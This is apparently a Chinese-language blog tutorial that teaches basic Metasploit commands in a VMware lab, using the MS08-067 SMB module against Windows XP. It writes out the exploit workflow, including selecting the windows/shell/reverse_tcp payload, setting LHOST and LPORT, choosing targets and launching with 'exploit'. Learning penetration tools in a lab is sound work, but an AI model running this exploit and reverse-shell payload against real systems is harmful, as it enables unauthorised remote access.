0x02 Metasploit 借助MS08_067学习基础命令WW

  1. 引入
  2. 开始
    1. show payloads
    2. show targets
    3. info
    4. 全局参数的设置与删除
    5. 保存当前配置
  3. 进行安全测试

引入

本篇借十多年前的老洞MS08_067来进行msf的学习

本篇着重介绍了

1.查看某模块(module)可用的攻击载荷(payload)及可攻击的系统

2.payload的设置与使用

开始

首先配置好测试环境,拓扑图如下:

(拓扑图过于简单,直接在VMware里配置一下就好)

search use show options set xxx xxx过于简单,这里就不再介绍

下面的命令均基于ms08_067_netapi

(即在实验前需use exploit/windows/smb/ms08_067_netapi

show payloads

该命令可查看适用于ms08_067_netapi的payload

(结果太多我就不列举了)

之后可以使用

set payload windows/shell/reverse_tcp

来选择payload(reverse_tcp)

之后可使用

show options

来查看该payload所需的设置项,如图

因为是反弹式的payload,所以需要设置接收连接的主机IP(LHOST)和接收端口(LPORT)

show targets

我们在使用某个模块时,需要知道它可以攻击什么系统

show targets就给我们提供了这个功能

需要注意的是,msf默认让程序自动判断目标机(即本例中的WINXP)的系统版本,如图

这种方法误报率较高,我们在测试的时候应尽量自己填写目标机系统,方法如下

set target [目标机系统Id]

info

若想知道某个模块的具体信息,直接在use该模块后输入info即可

全局参数的设置与删除

作用:对全局变量(如RHOST)进行设置/删除,不必每次遇到某个参数时都要重新设置

举例:

//设置
setg RHOST 192.168.1.1

//删除
unsetg RHOST 192.168.1.1

保存当前配置

作用:将当前配置保存,方便下次启动msf时使用

save

之后msf会返回文件保存的位置

若需要恢复到原始设置,将其删除即可

进行安全测试

相信在看过上边写的内容之后,我们已经知道如何配置各种选项了

进行攻击的方式也很简单

exploit

要是嫌字母太多的话直接

run

这俩的效果是一样的,msf中关于run的原话是这样的:

Alias for exploit

如果我的文章能帮到您的话我会很开心.如需转载记得注明出处:)
目录